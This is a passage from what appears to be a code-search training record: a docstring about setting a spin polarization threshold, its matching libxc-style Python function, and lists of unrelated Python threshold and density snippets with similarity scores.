self.suppressed = self.packet_count\n self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'suppressed': self.suppressed},})", "def setPowerFromDensity(self):\n self.p.power = self.p.powerDensity * self.getHMMass()", "def _set_bandwidth(self):\n if self._N > 0:\n self._kernel_cov = self._cov * self._N ** (-2./(self._dim + 4))\n\n # Used to evaluate PDF with cho_solve()\n self._cho_factor = la.cho_factor(self._kernel_cov)\n\n # Make sure the estimated PDF integrates to 1.0\n self._lognorm = self._dim/2.0 * np.log(2.0*np.pi) + np.log(self._N) +\\\n np.sum(np.log(np.diag(self._cho_factor[0])))\n\n else:\n self._lognorm = -np.inf", "def apply_thresholding(x):\n return x > threshold_otsu(x)", "def test_threshold_no_bounds(self):\n code, out, err = self.t.runError(\"--threshold\")\n self.assertIn(\"A min, and max, or both threshold values should be specified.\", out)", "def soft_threshold(X, sigma):\r\n tmp = abs(X) - sigma\r\n tmp[np.where(tmp < 0)] = 0\r\n return tmp * np.sign(X)", "def apply_threshold(heatmap, threshold):\n # Zero out pixels below the threshold\n heatmap[heatmap <= threshold] = 0\n # Return thresholded map\n return heatmap", "def apply_threshold(heatmap, threshold):\n # Zero out pixels below the threshold\n heatmap[heatmap <= threshold] = 0\n # Return thresholded map\n return heatmap", "def apply_threshold(heatmap, threshold):\n # Zero out pixels below the threshold\n heatmap[heatmap <= threshold] = 0\n # Return thresholded map\n return heatmap", "def cutoff(self, *args, **kwargs) -> Any:\n pass", "def soft_threshold(X, threshold):\n X_thresholded = (np.abs(X) > threshold).astype('int')\n X_soft_threshold = np.sign(X) * (np.abs(X) - threshold) * X_thresholded\n return X_soft_threshold", "def set_zeta_threshold(self, zeta_threshold):\n\n if zeta_threshold < 0:\n raise ValueError(\"The spin polarization threshold cannot be smaller than 0.\")\n\n core.xc_func_set_zeta_threshold(self.xc_func, ctypes.c_double(zeta_threshold))", "def _perturbInPlaceSoft(self):\n kevRandom = KevRandom()\n if random.random() < 0.5:\n newThreshold = -1\n while newThreshold < 0 or newThreshold > 1:\n newThreshold = self.threshold + kevRandom.laplacian() #* 0.1\n self.threshold = newThreshold\n else:\n self.beta += kevRandom.laplacian() #* 0.1", "def likelihood_threshold(dlc, threshold=0.9):\r\n features = np.unique(['_'.join(x.split('_')[:-1]) for x in dlc.keys()])\r\n for feat in features:\r\n nan_fill = dlc[f'{feat}_likelihood'] < threshold\r\n dlc[f'{feat}_x'][nan_fill] = np.nan\r\n dlc[f'{feat}_y'][nan_fill] = np.nan\r\n\r\n return dlc", "def _importance_based_graph_cut(self, graph, threshold):\n for node, data in graph.nodes_iter(data=True):\n if float(data['importance']) < threshold:\n graph.remove_node(node)\n return", "def __init__(self, factor: float = 0.5, threshold: float = 0.3, initial_val: float = 0.0) -> None:\n self.factor = factor\n self.threshold = threshold\n self.initial_val = initial_val", "def get_threshold(self):\n confs = self.confidence[\"conf\"]\n\n return compute_minimum_kernel_density(confs)", "def densitychange(self,dt=0.1):\n #Using conservation of mass and diffusion\n dp_dt = -div(self.u*self.d)\n dp_dt += ndimage.laplace(self.d)\n #This term seems to make the density clump together, producing \n #waves which can make the simulation blow up.\n #dp_dt -= np.add.reduce(self.u*np.array(np.gradient(self.d)))\n #Edge density shouldn't change.\n dp_dt[[0,-1]] = dp_dt[:,[0,-1]] = 0\n self.d += dp_dt*dt\n #Change pressure accordingly to ideal gas law\n #AAAAAAAAAAAAAAAA this fixed most of the poblems from before!!!\n self.P = self.d*8.214*273\n #Conserve mass by spreading out fluctuations \n self.d[1:-1,1:-1] += (self.mass-np.sum(self.d))/self.vol", "def SetNarrowBandwidth(self, value: 'double') -> \"void\":\n return _itkReinitializeLevelSetImageFilterPython.itkReinitializeLevelSetImageFilterIF2_SetNarrowBandwidth(self, value)", "def cutoff(self, state, depth):\n abstract", "def setFrequencyThreshold(self, v):\n return self._set(frequencyThreshold=v)", "def scale_down_utilization_threshold(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"scale_down_utilization_threshold\")", "def threshold_func(distribution: List[float], alpha: List[float], **kwargs) -> float:\n threshold = np.quantile(distribution, q=alpha, interpolation=\"lower\", **kwargs)\n return threshold", "def setThresholdLevel(self, *args):\n return _libsbml.Input_setThresholdLevel(self, *args)", "def unsafe(self): \n return self.distmin < self.distmax*0.5", "def set_filter_fq_pab(self, threshold):\n frequency_table = self._get_existence_frequency()\n self.filter = frequency_table > threshold", "def clearAttribute(self, attr):\n myAttr = getattr(self, attr)\n if type(myAttr) == types.FloatType:\n if myAttr < 1.0 and myAttr > 0.0:\n setattr(self, attr, 0.0)", "def setLowerThreshold(self, lower_threshold):\r\n\t\tself.LowerThreshold = lower_threshold", "def ignore_nan_inf(kde_method):\n def new_kde_method(events_x, events_y, xout=None, yout=None,\n *args, **kwargs):\n bad_in = get_bad_vals(events_x, events_y)\n if xout is None:\n density = np.zeros_like(events_x, dtype=float)\n bad_out = bad_in\n xo = yo = None\n else:\n density = np.zeros_like(xout, dtype=float)\n bad_out = get_bad_vals(xout, yout)\n xo = xout[~bad_out]\n yo = yout[~bad_out]\n # Filter events\n ev_x = events_x[~bad_in]\n ev_y = events_y[~bad_in]\n density[~bad_out] = kde_method(ev_x, ev_y,\n xo, yo,\n *args, **kwargs)\n density[bad_out] = np.nan\n return density\n\n doc_add = \"\\n Notes\\n\" +\\\n \" -----\\n\" +\\\n \" This is a wrapped version that ignores nan and inf values.\"\n new_kde_method.__doc__ = kde_method.__doc__ + doc_add\n\n return new_kde_method", "def thresholdfactor(self):\n return self.__thresholdfactor", "def _flag(self, test=False):\n\n if test:\n flag = self.test_flag\n else:\n flag = self._get_flag()\n\n # For each of the temperature add the threshold mask\n for var in TEMPERATURE_VARIABLES:\n self.add_mask(\n var, flag, 'discrepancy threshold exceeded',\n ('The discrepancy between the deiced and non-deiced temperature '\n f'sensors is greater than {TEMPERATURE_THRESHOLD} K.')\n )", "def soft_thresh(x: float, lmb: float) -> float:\n if x < lmb:\n return x + lmb\n elif x > lmb:\n return x - lmb\n else:\n return 0.0", "def set_print_density(self, density=10, break_time=2):\n self.write(self.ASCII_DC2, '#', (density << 5) | break_time)", "def setFrequencyThreshold(self, value):\n return self._set(frequencyThreshold=value)", "def filter_threshold(self, analyte, threshold, filt=False):\n params = locals()\n del(params['self'])\n\n # generate filter\n vals = trace = nominal_values(self.focus[analyte])\n if not isinstance(filt, bool):\n ind = (self.filt.grab_filt(filt, analyte) & ~np.isnan(vals))\n else:\n ind = ~np.isnan(vals)\n\n setn = self.filt.maxset + 1\n\n if any(ind):\n self.filt.add(analyte + '_thresh_below',\n trace <= threshold,\n 'Keep below {:.3e} '.format(threshold) + analyte,\n params, setn=setn)\n self.filt.add(analyte + '_thresh_above',\n trace >= threshold,\n 'Keep above {:.3e} '.format(threshold) + analyte,\n params, setn=setn)\n else:\n # if there are no data\n name = analyte + '_thresh_nodata'\n info = analyte + ' threshold filter (no data)'\n\n self.filt.add(name, np.zeros(self.Time.size, dtype=bool),\n info=info, params=params, setn=setn)", "def discretize(self, threshold=100):\n \n print(\"Starting discretization...\")\n \n if not \"nb_clust\" in self.conf.keys():\n print(\"No number of clusters assigned\\n\")\n self.set_nb_clusters()\n \n self.ts_dis = clustering(self.ts, self.conf[\"nb_clust\"])\n \n error = MAPE(self.ts, self.ts_dis)\n print(error)\n \n if error > threshold:\n self.ts_dis = self.ts\n print(\"\\nError is too high, original time series will be used instead of disctretized one\\n\")\n \n print(\"Discretization done\\n\")", "def prune_dims(variances, threshold=0.005):\r\n scale_z = np.sqrt(variances)\r\n return scale_z >= threshold", "def back_pressure_data_size_threshold(self, back_pressure_data_size_threshold):\n\n self._back_pressure_data_size_threshold = back_pressure_data_size_threshold", "def threshold(self) -> Union[float, TensorType]:\n return self._threshold", "def setErrorThreshold(self, threshold):\n return self._set(errorThreshold=threshold)" ]
[ "0.63226175", "0.61955786", "0.6171416", "0.61262935", "0.59644085", "0.58235157", "0.58235157", "0.58235157", "0.58235157", "0.58235157", "0.57770663", "0.5771117", "0.5760468", "0.5694355", "0.5690046", "0.56802684", "0.5664838", "0.56599784", "0.56505716", "0.5615393", "0.56036675", "0.5583478", "0.55800015", "0.55748904", "0.55462146", "0.55284065", "0.5477165", "0.5432412", "0.542168", "0.5413156", "0.5410299", "0.53955984", "0.53846335", "0.53846335", "0.53846335", "0.53818756", "0.53568023", "0.53568023", "0.53568023", "0.53568023", "0.53568023", "0.5356664", "0.5345707", "0.53343683", "0.53308564", "0.53125155", "0.53105295", "0.5280523", "0.5264158", "0.5219156", "0.5217601", "0.5215107", "0.51969707", "0.5193638", "0.51849675", "0.51827073", "0.51810324", "0.51809156", "0.51791316", "0.5179002", "0.5174902", "0.5174852", "0.5152643", "0.5149663", "0.5145568", "0.51445156", "0.51413494", "0.51413494", "0.51413494", "0.51399225", "0.51366204", "0.51238984", "0.5114076", "0.5105572", "0.5104843", "0.5104542", "0.5103847", "0.50999373", "0.50998485", "0.5099668", "0.5093008", "0.50887877", "0.5085546", "0.508254", "0.50723994", "0.5071583", "0.50704247", "0.5067419", "0.5061885", "0.50618815", "0.50603503", "0.5037746", "0.5034068", "0.5031863", "0.5027113", "0.50204664", "0.5015657", "0.50053734", "0.49967954", "0.4990803" ]
0.7752366
0
Sets the spin polarization threshold below which components will not be evaluated.
def set_zeta_threshold(self, zeta_threshold): if zeta_threshold < 0: raise ValueError("The spin polarization threshold cannot be smaller than 0.") core.xc_func_set_zeta_threshold(self.xc_func, ctypes.c_double(zeta_threshold))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_threshold(self, threshold):\n self._threshold = check_value_positive('threshold', threshold)", "def setThreshold(self, threshold): # real signature unknown; restored from __doc__\n pass", "def setAngleLimit(angle_limit):\n return RoboCaller().call(\"setAngleLimit\", \"void\", angle_limit)", "def set_throttle(self, val):\n\n # Set the motor to stop mode.\n if val is None:\n self.in1.off()\n self.in2.off()\n self.pwm.value = 1.0\n\n else:\n # Determine the orientation of the motor.\n if val > 0.0:\n self.in1.off()\n self.in2.on()\n else:\n self.in1.on()\n self.in2.off()\n\n # Clamp the pwm signal (throttle) to [0, 1].\n pwm = max(0.0, min(abs(val), 1.0))\n\n # Note that setting PWM to low will brake the motor no matter what\n # in1 and in2 input is.\n self.pwm.value = pwm", "def clamp(self):\n self.threshold.data.clamp_(self.min_threshold)", "def _r_spin_changed(self):\n self.rLine.setValue(self.rSpin.value())", "def set_limit_min():\n limit_min = request.params.get(\"limit_min\", 0, type=float)\n output = request.params.get(\"output\", 1, type=int)\n retval = RP_LIB.rp_LimitMin(output, ctypes.c_float(limit_min))\n if retval != 0:\n LOG.error(\"Failed to set minimum output voltage. Error code: %s\", ERROR_CODES[retval])", "def _set_bet_limit(self) -> None:\n for i, ratio in enumerate(BET_LIMIT_RATIOS):\n self._bet_limits[i] = self._treasury_min.get() // ratio", "def __init__(self, threshold: float = 0.3, initial_val: float = 0.0) -> None:\n self.threshold = threshold\n self.initial_val = initial_val", "def _b_spin_changed(self):\n self.bLine.setValue(self.bSpin.value())", "def set_strength_ratios(\n self,\n strength_ratios: Union[float, Tuple[float], np.ndarray],\n ):\n self._strength_ratios = np.clip(\n _convert_to_np_array(strength_ratios, self._num_motors), 0, 1)", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setLowerThreshold(self, lower_threshold):\r\n\t\tself.LowerThreshold = lower_threshold", "def set_min_uncertainty(signal, threshold=0.05):\n # Increase Hirex-Sr uncertainties to be a rel error of 5% minimum (JUST FOR TESTING)\n corrected_unc=signal.std_y/signal.y<=0.05\n signal.std_y[corrected_unc]=0.05*signal.y[corrected_unc]\n\n # correction for normalized uncertainties\n if signal.s/signal.m<=0.05:\n signal.s=0.05*signal.m\n\n signal.std_y_norm=scipy.sqrt((signal.std_y / signal.m)**2.0 + ((signal.y / signal.m)*(signal.s / signal.m))**2.0)", "def setMoveThreshold(self, thresholdLoc, thresholdRot):\r\n self.moveThresholdLoc = thresholdLoc\r\n self.moveThresholdRot = thresholdRot", "def updateThresholdValues (self, DoubleSlider, Node, ThMax ):\n DoubleSlider.Slider.minimum = 0\n DoubleSlider.SpinBoxL.setRange(0,ThMax)\n DoubleSlider.Slider.maximum = ThMax\n DoubleSlider.SpinBoxR.setRange(0,ThMax)\n if ThMax!=0:\n DisplayNode = Node.GetScalarVolumeDisplayNode()\n LowerThreshold = DisplayNode.GetLowerThreshold()\n UpperThreshold = DisplayNode.GetUpperThreshold()\n DoubleSlider.Slider.minimumValue = LowerThreshold\n DoubleSlider.Slider.maximumValue = UpperThreshold \n DoubleSlider.SpinBoxL.blockSignals(True)\n DoubleSlider.SpinBoxR.blockSignals(True)\n DoubleSlider.SpinBoxL.value = LowerThreshold\n DoubleSlider.SpinBoxR.value = UpperThreshold\n DoubleSlider.SpinBoxL.blockSignals(False)\n DoubleSlider.SpinBoxR.blockSignals(False)", "def angle_tolerance(self, angle_tolerance):\n\n self._angle_tolerance = angle_tolerance", "def init_patch_clamp(self):\n\n self.pressure.nearing()\n\n # Auto pipette offset and holding at 0 V\n self.amplifier.meter_resist_enable(False)\n self.amplifier.auto_pipette_offset()\n self.amplifier.set_holding(0.)\n self.amplifier.set_holding_enable(True)\n\n # Begin metering\n self.amplifier.meter_resist_enable(True)\n # wait for stable measure\n time.sleep(4)\n # Get pipette resistance\n self.pipette_resistance = self.get_single_resistance_metering(res_type='float')\n if 5e6 > self.pipette_resistance:\n self.update_message('ERROR: Tip resistance is too low ({}).'\n ' Should be higher than 5 MOhm.'.format(self.get_single_resistance_metering('text')))\n self.amplifier.meter_resist_enable(False)\n return 0\n if 10e6 < self.pipette_resistance:\n self.update_message('ERROR: Tip resistance is too high ({}).'\n ' Should be lower than 10 MOhm.'.format(self.get_single_resistance_metering('text')))\n self.amplifier.meter_resist_enable(False)\n return 0\n else:\n self.update_message('Tip resistance is good: {}'.format(self.get_single_resistance_metering('text')))\n self.pipette_resistance_checked = True\n self.set_continuous_meter(True)\n return 1", "def set_polar_max(self, polar_max):\n try:\n if not isinstance(self.polar_angle, np.ndarray):\n self.polar_angle, self.azimuthal_angle = \\\n self.calculate_angles(self.xp, self.yp)\n self.x = []\n self.y = []\n for i in range(self.npks):\n if self.polar_angle[i] <= polar_max:\n self.x.append(self.xp[i])\n self.y.append(self.yp[i])\n except Exception:\n pass\n self.polar_max = polar_max\n self._idx = None", "def set_tau_threshold(self, tau_threshold):\n\n if tau_threshold < 0:\n raise ValueError(\"The tau threshold cannot be smaller than 0.\")\n\n core.xc_func_set_tau_threshold(self.xc_func, ctypes.c_double(tau_threshold))", "def back_pressure_object_threshold(self, back_pressure_object_threshold):\n\n self._back_pressure_object_threshold = back_pressure_object_threshold", "async def async_set_unav_throttle(self, unav_throttle):\n self._unav_throttle = unav_throttle", "def setRange(self, range):\n\t\tself.range = range\n\t\tself.slider.setMinimum(0.0)\n\t\tself.slider.setMaximum(100.0)\n\t\tself.spinbox.setRange(self.range[0], self.range[1])\n\n\t\tdiff = self.range[1] - self.range[0]\n\t\tif diff <= 1:\n\t\t\tself.spinbox.setSingleStep(0.01)", "def __init__(self, rt_tol, exclusion_t_0):\n super().__init__()\n self.rt_tol = rt_tol\n self.exclusion_t_0 = exclusion_t_0\n assert self.exclusion_t_0 <= self.rt_tol", "def SetThreshold (self,VolumeNode, min, max):\n DisplayNode = VolumeNode.GetScalarVolumeDisplayNode()\n DisplayNode.SetApplyThreshold(True)\n DisplayNode.SetThreshold(min,max)", "def setUpperThreshold(self, upper_threshold):\r\n\t\tself.UpperThreshold = upper_threshold", "def threshold(self,thresholdValue):\n # TO DO\n pass", "def _set_minimum(self):\n self._level_gen.minimum_length = self._minimum_length_spinbox.value()\n self._refresh_view()", "def apply_constraint(self):\n\t\tself.angle = self.constraint(self.angle) % 360", "def _spin_changed(self, event):\n val = event.GetValue()\n if val < self.minval:\n self.minval = val\n elif val > self.orig_min:\n self.minval = self.orig_min\n if val > self.maxval:\n self.maxval = val\n elif val < self.orig_max:\n self.maxval = self.orig_max\n self.slider.SetValue(100*(val-self.minval)/(self.maxval-self.minval))\n if self.handler:\n self.handler(event)\n event.Skip()", "def spinAround(self):", "def updateThreshold(self, t):\n\n budget = self.budget\n self.threshold = self.init_threshold * self.diameter * ((budget-t) / self.budget)**self.decay_factor", "def _g_spin_changed(self):\n self.gLine.setValue(self.gSpin.value())", "def lbs_changed(self):\n kgs = round(self.spinLbs.value() * 0.453592, 1)\n self.spinKgs.setValue(kgs)", "def spinUpBatter(self):\n self.setVelocity(config.batterShootSpeed)", "def tolerance(self, tolerance: float) -> None:\n self._tolerance = tolerance", "def set_neutral(self, braked=False):\r\n # Setting MOTOR pins to LOW will make it free wheel.\r\n pin_value = 0\r\n if braked:\r\n pin_value = 1 # Setting to HIGH will do active braking.\r\n\r\n # Set a and b pins to either 1 or 0.\r\n if self.a_pin >= 0:\r\n self.GPIO.output(self.a_pin, pin_value)\r\n if self.b_pin >= 0:\r\n self.GPIO.output(self.b_pin, pin_value)\r\n\r\n # Turn motors off by setting duty cycle back to zero.\r\n dutycycle = 0.0\r\n self.target_speed = 0.0\r\n self.current_speed = 0.0\r\n self.PWM.ChangeDutyCycle(dutycycle)", "def set_tolerance(self, tol):\n self.tolerance = tol", "def set_rmax(self, x):\n x = float(x)\n if self.rmax != x:\n self.rmax = x", "def update_spin(self):\n if self.spin:\n self.angle += self.deltaAng\n self.stepsLeft -= 1\n if self.stepsLeft == 0:\n self.replication += self.deltaRep\n if self.revolution % 2 == 0:\n self.offset += self.deltaOff\n self.stepsLeft = self.stepsPer90\n\n if self.angle >= 360.0:\n self.revolution += 1\n self.angle = 0\n self.offset = 0\n self.deltaRep = -self.deltaRep\n glutPostRedisplay()", "def trimCompo(self, threshold):\n newCompo = {}\n for key,value in self.m_compo.items():\n if value > threshold:\n newCompo[ key ] = value\n self.m_compo = newCompo", "def set_particle_tolerance(self, value):\n\n self._particle_tolerance = value", "def on_spinBox_valueChanged(self, p0):\n self.nbr_pts_caracterisation = self.spinBox.value()", "def set_thresh(self, t0=0.5, t1=None):\n self.t0 = t0\n self.t1 = t1", "def matrix_filtering_threshold(self, matrix_filtering_threshold):\n\n self._matrix_filtering_threshold = matrix_filtering_threshold", "def setInternalPulser(self,pulserEnable,pulseHeight):\n pass", "def reduce_velocity(self):\n if self.controls[\"make_velocity_0\"]:\n # print(self.controls[\"bar_move_velocity\"])\n self.controls[\"bar_move_velocity\"] = 0", "def spin_input(self) -> None:\n self.spin_command = not self.spin_command", "def _set_volume(self, polytope_volume):\n if polytope_volume < 0.0:\n raise ValueError(\n '`polytope_volume` must be >= 0, given: {v}'.format(\n v=polytope_volume))\n self._volume = float(polytope_volume)", "def setAzimuthAngle(self, angle):\n angle = int(round(angle))\n if angle != self._azimuth:\n self._azimuth = angle\n self._updateLight()\n self.sigAzimuthAngleChanged.emit()", "def invalidate_min_max(self):\n self.max_amplitude = None\n self.min_amplitude = None\n self.max_wavenumber = None\n self.min_wavenumber = None", "def set_collision_sensitivity(self, value, wait=True):\r\n return self._arm.set_collision_sensitivity(value, wait=wait)", "def reset_colors(self):\n self.spinMinHue.setValue(0)\n self.spinMaxHue.setValue(180)\n self.spinMinSaturation.setValue(0)\n self.spinMaxSaturation.setValue(255)\n self.spinMinValue.setValue(0)\n self.spinMaxValue.setValue(255)", "def setPSampling(self, period):\n if (period < 30 or period > 300):\n return\n self.pSampling = period", "def set_tms_pin_low(self):\n self._dll.JLINKARM_ClrTMS()", "def setBrake(self, brake):\r\n if brake < 0.0:\r\n brake = 0.0\r\n elif brake > 1.0:\r\n brake = 1.0\r\n brake *= self.maxBrake\r\n for tire in self.tires:\r\n if tire.brake:\r\n tire.shape.setBrakeTorque( brake )", "def set_wheel(self, wheel):\n self.wheel_turn = clamp(wheel, -1, 1)", "def strict_limit(self, strict_limit):\n\n self._strict_limit = strict_limit", "def clip(self):\n if self._value < self.lowBound:\n self._value = self.lowBound\n elif self._value > self.upBound:\n self._value = self.upBound", "def set_tolerance(self, *args, **kwargs):\n raise ParameterError(\"The %s StoppingCriterioin does not yet support resetting tolerances.\")", "def reset(self,):\n \n self.i = 0\n self.pi = 1.0\n self.si = 0.0\n self.pi_min = float(\"inf\")\n self.si_min = float(\"inf\")", "def quieter(self):\n self._prepare()\n vol = self._eng.getProperty(\"volume\")\n newvol = vol - 0.25\n logging.debug(\"quieter %f => %f\" %(vol, newvol))\n self._eng.setProperty(\"volume\", newvol)\n self._eng.runAndWait()\n self.say(\"quieter\")", "def __init__(self):\n super().__init__()\n self.TERRAIN_VARIANCE = 0.0", "def apply_default_constraints(self):\n try:\n self.apply_secthresh(pipeline_weaksec(self.koi))\n except NoWeakSecondaryError:\n logging.warning('No secondary eclipse threshold set for {}'.format(self.koi))\n self.set_maxrad(default_r_exclusion(self.koi))", "def _unblock_signals(self):\n self._minimum_length_spinbox.blockSignals(False)\n self._maximum_length_spinbox.blockSignals(False)\n self._seed_le.blockSignals(False)", "def set_throttle(self, limit=None, units=None):\n self.delay = 0\n self.max_requests = 1e16\n self.made_requests = 0", "def set_tck_pin_low(self):\n res = self._dll.JLINKARM_ClrTCK()\n if res < 0:\n raise errors.JLinkException('Feature not supported.')\n return None", "def disableCorrelation( band=range(9,25) ) : \n enableCorrelation(band, False)", "def reset(self):\n if self.allowable_max < self.allowable_min:\n raise ValueError(\"{0} max less than min\".format(self))\n self.min_found = self.allowable_max * 1e6\n self.max_found = self.allowable_min * 1e-6\n self.avg_found = self.allowable_min * 0.0\n self.count = 0\n self.value = None", "def reset(self, **kwargs):\n coverage_filter = np.zeros((self.region, self.region))\n coverage_filter[np.random.uniform(0, 1, (self.region, self.region)) < self.coverage] = 1.\n self.resources = np.multiply(\n np.random.uniform(self.min_value, self.max_value, (self.region, self.region)),\n coverage_filter\n )", "def _init_tbd(self, threshold): \n self.threshold = threshold\n self.current_state = self.undefined_band\n self.num_intervals = np.array([0, 0, 0])", "def set_max_volume(self, max_volume):\n self.max_volume = max_volume\n\n if self.max_volume <= self.min_volume:\n raise RuntimeError(\n 'Pipette max volume is less than '\n 'min volume ({0} < {1})'.format(\n self.max_volume, self.min_volume))\n\n self.update_calibrations()\n\n return self", "def takeOff(self):\n\t\tself._altHoldController.setTarget(self._MAX_ALTITUDE)\n\t\tself._taking_off = False", "def reset_uncertainties(self):\n\n # Make a new temporary ExoParameter using the original self.template\n # dictionary and copy the uncertainty values.\n blank = ExoParameter(\"fake\", attr_dict=self.template)\n self.uncertainty = blank.uncertainty\n self.uncertainty_lower = blank.uncertainty_lower\n self.uncertainty_upper = blank.uncertainty_upper", "def __set_max_value(self, value: int) -> None:\n self.__max_value = value * 2000\n half_value = self.__max_value // 2\n\n self.__x_spinbox.configure(from_=-half_value, to=half_value)\n self.__x_scale.configure(from_=half_value, to=-half_value)\n self.__y_spinbox.configure(from_=-half_value, to=half_value)\n self.__y_scale.configure(from_=-half_value, to=half_value)\n self.__z_spinbox.configure(from_=-half_value, to=half_value)\n self.__z_scale.configure(from_=half_value, to=-half_value)", "def adjustAngle(self, angle):\n\t\tif self.timeout <= 0:\n\t\t\tself.angle = (self.angle + angle) % 360", "def set_trst_pin_low(self):\n self._dll.JLINKARM_ClrTRST()", "def min_voltage_limit(self, value):\n self._write(MX_MIN_VOLTAGE_LIMIT, value)", "def set_lower_slope(self, lbound, ubound):\n self.lower_slope_l_bound = lbound\n self.lower_slope_u_bound = ubound\n self.is_slope_optimised = True", "def testSetDisabled(self):\n self.mgr.enabled = False\n self.mgr.setGimbalEnabledParam()\n self.mgr.shotMgr.vehicle.message_factory.param_set_encode.assert_called_with(0, mavutil.mavlink.MAV_COMP_ID_GIMBAL, # target system, target component\n \"GMB_GP_CTRL\", 0.0, mavutil.mavlink.MAV_PARAM_TYPE_REAL32 )", "def suck(self, speed=Constants.SUCK_SPEED):\n self.setPercentOutput(speed, -speed)", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def constrainSpeed(self, speedRPM):\n\n if speedRPM > self.motorMaxRPM:\n speedRPM = self.motorMaxRPM\n\n if speedRPM < 0.0:\n speedRPM = 0.0\n\n# print ( \"motorSpeed RPM adjusted: \", speedRPM )\n\n return speedRPM", "def set_allow_approx_motion(self, on_off):\r\n return self._arm.set_allow_approx_motion(on_off)", "def setErrorThreshold(self, threshold):\n return self._set(errorThreshold=threshold)", "def setErrorThreshold(self, threshold):\n return self._set(errorThreshold=threshold)", "def threshold(self) -> float:\n return pulumi.get(self, \"threshold\")", "def kgs_changed(self):\n lbs = round(self.spinKgs.value() * 2.20462, 1)\n self.spinLbs.setValue(lbs)", "def set_pin(self):\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(self.pin, GPIO.OUT)\n GPIO.output(self.pin, GPIO.LOW)\n time.sleep(3)\n GPIO.output(self.pin, GPIO.HIGH)", "def setSnrMin(_snrMin):\n \n simuConfig[\"SNR.MIN\"] = _snrMin", "def lower_bri(self):\r\n for light in self.lights:\r\n bri = self.b.get_light(light,'bri')\r\n bri = bri - 50\r\n if bri < 0:\r\n bri = 1\r\n self.b.set_light(light,'bri',bri)", "def update_vrad_tolerance(self):\n try:\n value = float(self.edit_vrad_tolerance.text())\n except:\n value = None\n self._get_selected_model().metadata[\"velocity_tolerance\"] = value\n return None", "def reset(self):\n self.value = self.min_value", "def __init__(self):\n super(SteklovBoundary, self).__init__()\n self.value = SteklovBoundary.value\n SteklovBoundary.value -= 1\n self.update(param=\"1\")", "def louder(self):\n self._prepare()\n vol = self._eng.getProperty(\"volume\")\n newvol = vol + 0.25\n logging.debug(\"louder %f => %f\" %(vol, newvol))\n self._eng.setProperty(\"volume\", newvol)\n self._eng.runAndWait()\n self.say(\"louder\")" ]
[ "0.58173597", "0.57458097", "0.55919087", "0.5545165", "0.55155236", "0.547716", "0.53742176", "0.53729236", "0.5330762", "0.5303351", "0.52957284", "0.52762413", "0.52762413", "0.52762413", "0.52762413", "0.52762413", "0.52495974", "0.52326035", "0.5226283", "0.52042127", "0.5200355", "0.51992065", "0.5178476", "0.51647085", "0.5164071", "0.5156143", "0.51475084", "0.51460373", "0.51223147", "0.50994235", "0.50617015", "0.50491667", "0.50251096", "0.50116545", "0.5008973", "0.500262", "0.49928716", "0.49905425", "0.4983977", "0.49747238", "0.49592257", "0.49461856", "0.49241948", "0.4923978", "0.49132994", "0.4904083", "0.48962602", "0.4895058", "0.48942098", "0.4892044", "0.4889993", "0.48856276", "0.48779017", "0.4877476", "0.48686197", "0.48612985", "0.48483986", "0.4847416", "0.48457298", "0.48415738", "0.48412797", "0.48355907", "0.48253188", "0.4822181", "0.48210692", "0.4804842", "0.47988266", "0.47958314", "0.4795421", "0.47896388", "0.47847176", "0.47794822", "0.47783297", "0.47739398", "0.47670078", "0.47663385", "0.47661117", "0.47645858", "0.47591284", "0.4755684", "0.47528884", "0.4752548", "0.47500303", "0.47438258", "0.47353458", "0.47352046", "0.47352046", "0.47225988", "0.47209358", "0.47174025", "0.47174025", "0.47057098", "0.47017032", "0.46896735", "0.4689306", "0.46858412", "0.46855202", "0.4683136", "0.46619698", "0.466007" ]
0.56321895
2
Sets the smallest value allowed for sigma = \sqrt(\gamma). Smaller values than this get overwritten in the evaluation.
def set_sigma_threshold(self, sigma_threshold): if sigma_threshold < 0: raise ValueError("The sigma threshold cannot be smaller than 0.") core.xc_func_set_sigma_threshold(self.xc_func, ctypes.c_double(sigma_threshold))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _update_gamma(self):\n # type: () -> None\n if self._world is None:\n self.gamma = np.inf\n return\n # higher bound for the free space volume\n config_space_volume = self._world.get_configuration_space_volume()\n gamma_L = 8*(4/3)* config_space_volume\n self.gamma = gamma_L", "def update_sigma(self):\n self.sigma = self.spw.sigmaSpinBox.value()", "def setGammaValueFromSlider(self):\n self.gammaSpinBox.setValue( self.gammaSlider.value / 1000 )", "def setGammaValueFromSpinBox(self):\n self.gammaSlider.setValue( self.gammaSpinBox.value * 1000)", "def set_gamma(self, name):\n if name=='1H':\n self.gamma=267.513e6*self.time_fact\n #In standard freq: 42.576e6\n elif name=='13C':\n self.gamma=67.262e6*self.time_fact\n # Good average unknown\n self.csa=-130e-6\n elif name=='15N':\n self.gamma=-27.116e6*self.time_fact\n # Large variation possible. See Fushman, Tjandra, and Cowburn, 1998.\n # Also use more commonly accepted value.\n self.csa=-170e-6\n elif name=='17O':\n self.gamma=-36.264e6*self.time_fact\n elif name=='19F':\n self.gamma=251.662e6*self.time_fact\n elif name=='31P':\n self.gamma=108.291e6*self.time_fact", "def update_q(self):\n beta = self.EC_beta\n self.gamma_q = (self.gamma_s - self.gamma_r) * beta + (1 - beta) * self.gamma_q\n self.Sigma_q = (self.Sigma_s - self.Sigma_r) * beta + (1 - beta) * self.Sigma_q\n try:\n assert np.all(np.logical_not(np.isnan(self.gamma_q)))\n except:\n print(\"Invalid update encountered...\")", "def clamp_sigma(self, sigma, sigma_min=.01):\n self.logsigma.data.clamp_(np.log(sigma_min), np.log(sigma))", "def lgamma(x):\n return 0.0", "def gamma(self, gamma):\n\n self._gamma = gamma", "def _gammaParameter(self, t : 